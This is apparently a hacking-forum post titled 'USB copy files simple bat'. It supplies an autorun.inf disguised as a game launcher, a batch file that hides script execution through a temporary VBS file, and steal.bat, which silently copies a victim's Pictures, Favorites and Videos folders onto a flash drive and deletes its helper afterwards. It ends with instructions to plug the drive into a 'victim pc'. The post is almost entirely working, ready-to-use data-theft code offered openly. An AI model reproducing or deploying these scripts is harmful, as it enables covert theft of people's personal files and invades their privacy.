mouse002 Rare Posted December 22, 2018 Share Posted December 22, 2018 (edited) autorun.inf [autorun] icon=drive.ico open=invisible.bat action=Click ok to Run game for Windows shell\open\command=invisible.bat Invisible.bat @echo off if not exist "%TEMP%\invisible.vbs" ( echo CreateObject("Wscript.Shell"^).Run """" ^& Wscript.Arguments(0^) ^& """",0,False > "%TEMP%\invisible.vbs" ) Wscript.exe "%TEMP%\invisible.vbs" "%DRIVE%\steal.bat" pause steal.bat @echo off xcopy /s/c/d/e/h/i/r/y "%USERPROFILE%\Pictures" "%DRIVE%\stolen files\Pictures" xcopy /s/c/d/e/h/i/r/y "%USERPROFILE%\Favorites" "%DRIVE%\stolen files\Favorites" xcopy /s/c/d/e/h/i/r/y "%USERPROFILE%\videos" "%DRIVE%\stolen files\Videos" if exist "%TEMP%\invisible.vbs" del "%TEMP%\invisible.vbs" copy all 3 and paste on flash drive to work and connect to victim pc Edited December 22, 2018 by mouse002 Link to comment https://cyberbreach.io/topic/204291-usb-copy-files-simple-bat/ Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now